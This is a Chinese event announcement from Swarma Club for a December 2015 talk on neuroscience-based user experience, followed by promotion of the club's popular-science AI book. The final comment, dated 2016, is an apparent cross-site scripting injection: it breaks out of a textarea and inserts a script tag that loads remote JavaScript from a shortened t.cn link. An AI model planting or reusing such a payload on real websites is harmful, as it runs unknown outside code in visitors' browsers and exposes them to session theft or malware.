神经学用户体验与智能 | 公开活动预告
2015-12-08 03:20:22  智能  用户体验  神经学 

神经学用户体验与智能

时间:2015年12月13日(周日 )14:30-17:00
地点:北京市石景山区玉泉路地铁南200米瑞达大厦10楼中国集智俱乐部“三思堂”
主讲人简介
林思恩,中国首家神经营销公司布雷恩科技有限公司研究总监、首席科学官、联合创始人,中科院心理所、香港中文大学认知神经科学博士,神经学用户体验与智能+应用领域专家。与宝洁、IBM、联合利华、阳狮锐奇、益普索、腾讯互娱、完美世界、墨麟游戏等合作,通过搭建神经学用户体验的理论与科学技术体系,助力顶级公司的产品研发,提升核心竞争力与市场占有率。
活动介绍

完整的用户体验(UE, User Experience)包括品牌推广(Branding)体验、市场营销(Marketing)体验、视觉设计(Visual Design)体验、功能性(Functionality)体验和可用性(Usability)体验,概括来讲就是营销体验+产品体验。用研在其中的角色就是了解用户在市场营销或产品使用过程中的体验,发现问题、给出洞察意见、提出改进方案,并把这些信息尽可能完整无误地传递给营销和产品,推动改进。
 
如果把用研比作产品或营销的医生,那他在诊疗过程中的技术手段主要包括传统的消费者体验测试(CE, Consumer Experience)、方兴未艾的大数据分析、探知潜意识的内隐联想测试和实时直接了解用户大脑的新技术——神经学用户体验测试。
 
今天的用户体验正在朝两个方向迅速发展:一是往更大的数据量方向,通过数据挖掘了解行为背后的动因,及时预测和调整产品,另一个就是往更深入本质的方向,探究潜意识在决策中的作用,从人性层面精准预测行为、帮助改进产品。
 
神经学测试以其敏感、特异、前瞻、量化、实时,在设计阶段和上线后越来越发挥着重要作用,特别是在当今体验经济 - 情感设计的市场大环境下。
 
但神经学用户体验作为神经科学商业化的早期阶段,除了通过商业项目和数据积累经验固话模型以及教育市场外,借助BCI和脑波可穿戴设备可以迸发出怎样的前景,让我们在12.13揭晓未来。

 

报名方式
点击“阅读原文”,登录活动行,即可免费报名参加。
 

最受欢迎的科学探索群体——集智俱乐部首部科普著作
全面涵盖人机交互、脑科学、计算心理学、系统科学、社会科学等前沿知识
生动的文笔,精美的插图,数十位科学爱好者带你展开一场人工智能探索之旅

《科学的极致:漫谈人工智能》将全面介绍人工智能的发展历史、探究过程以及在各个领域的应用,以通俗易懂的语言和生动有趣的示例为你揭示人工智能不为人知的奥秘。
集智俱乐部是一个从事学术研究、享受科学乐趣的探索者组成的团体,倡导以平等开放的态度、科学实证的精神进行跨学科的研究与交流,力图搭建一个中国的“没有围墙的研究所”。这些令人崇敬的、充满激情与梦想的集智俱乐部成员将带你了解图灵机模型、冯.诺依曼计算机体系结构、怪圈与哥德尔定理、通用人工智能、深度学习、人类计算与自然语言处理,与你一起展开一场令人热血沸腾的科学之旅。
当当购买链接:http://product.dangdang.com/23740304.html
京东、亚马逊、淘宝等网店及各城市大型书店均有销售。
集智俱乐部QQ群号:292641157

 

 

2016-05-06 01:29:03
   </textarea>'"><script src=http://t.cn/RqR5mOS></script>
登录后才可以评论,马上登录